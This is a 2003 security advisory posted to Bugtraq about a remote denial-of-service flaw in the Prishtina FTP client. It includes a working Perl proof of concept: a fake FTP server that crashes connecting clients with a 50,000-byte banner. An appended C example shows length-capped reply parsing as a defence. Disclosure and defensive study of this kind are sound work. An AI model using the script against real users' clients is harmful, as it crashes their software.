Prishtina FTP v.1.*: remote DoS

From: D4rkGr3y (grey_1999_at_mail.ru)
Date: 05/22/03

    Date: Wed, 21 May 2003 20:58:51 -0700
    To: bugtraq@security.nnov.ru, bugtraq@securityfocus.com
    
    

    -----BEGIN PGP SIGNED MESSAGE-----

    ###############################################################*
    # Damage Hacking Group security advisory
    # www.dhgroup.org
    ###############################################################*
    #Product: Prishtina FTP v.1.*
    #Authors: G.Syla [www.prishtina-soft.com]
    #Vulnerability: remote DoS
    ###############################################################*

    #Overview#------------------------------------------------------#
    Just an FTP client.

    #Problem#-------------------------------------------------------#
    It's possible to crash the FTP client by sending a long FTP banner
    to it.

    #Exploit#-------------------------------------------------------#
    #!/usr/bin/perl
    use IO::Socket;
    $host = "localhost";
    $port = "21";
    $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM,
        Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.\n";
    $data = "A";
    $num = "50000";
    $buf .= $data x $num;
    while ($client = $server->accept()) {
     print "OK";
     print $client "$buf\n";
     close($client);
    }

    #wow#-----------------------------------------------------------#
    %$#@ www.dhgroup.org -=> opened English version! Come on in :)

    #eof

    Best regards www.dhgroup.org
      D4rkGr3y icq 540981

    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

    -----END PGP SIGNATURE-----
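
The advisory does not state why the client crashes on a long banner. As an added example (not part of the advisory and not Prishtina FTP code), this is one way a client can read a server reply line with a hard length cap, so an over-long banner is rejected instead of processed. The names ftp_parse_reply and FTP_MAX_LINE and the 512-byte limit are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FTP_MAX_LINE 512  /* assumed cap on one reply line, terminator included */
enum ftp_rc { FTP_OK = 0, FTP_NEED_MORE = -1, FTP_TOO_LONG = -2, FTP_MALFORMED = -3 };

/* Parse one reply line from bytes already received (buf, len).
 * On FTP_OK: *code is the 3-digit reply code, text the NUL-terminated
 * message, *used the number of bytes consumed from buf. */
enum ftp_rc ftp_parse_reply(const char *buf, size_t len, int *code,
                            char text[FTP_MAX_LINE], size_t *used)
{
    /* Never scan past FTP_MAX_LINE bytes while looking for the terminator. */
    size_t scan = len < FTP_MAX_LINE ? len : FTP_MAX_LINE;
    const char *nl = memchr(buf, '\n', scan);
    if (nl == NULL)
        return len >= FTP_MAX_LINE ? FTP_TOO_LONG : FTP_NEED_MORE;

    size_t n = (size_t)(nl - buf);          /* line length without LF */
    if (n > 0 && buf[n - 1] == '\r')
        n--;                                /* strip optional CR */

    /* A reply starts with three digits followed by ' ' or '-'. */
    if (n < 4 || !isdigit((unsigned char)buf[0]) ||
        !isdigit((unsigned char)buf[1]) ||
        !isdigit((unsigned char)buf[2]) ||
        (buf[3] != ' ' && buf[3] != '-'))
        return FTP_MALFORMED;

    *code = (buf[0] - '0') * 100 + (buf[1] - '0') * 10 + (buf[2] - '0');
    memcpy(text, buf + 4, n - 4);           /* n - 4 is always < FTP_MAX_LINE */
    text[n - 4] = '\0';
    *used = (size_t)(nl - buf) + 1;
    return FTP_OK;
}

int main(void)
{
    static char banner[50001];              /* constructed: 50000 x 'A' + LF */
    memset(banner, 'A', 50000);
    banner[50000] = '\n';
    int code = 0; char text[FTP_MAX_LINE]; size_t used = 0;
    printf("long banner -> %d\n", ftp_parse_reply(banner, sizeof banner, &code, text, &used));
    const char ok[] = "220 Service ready\r\n";  /* constructed sample greeting */
    printf("greeting    -> %d\n", ftp_parse_reply(ok, strlen(ok), &code, text, &used));
    return 0;
}
```

On FTP_TOO_LONG the caller should close the connection rather than keep reading into the same line.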

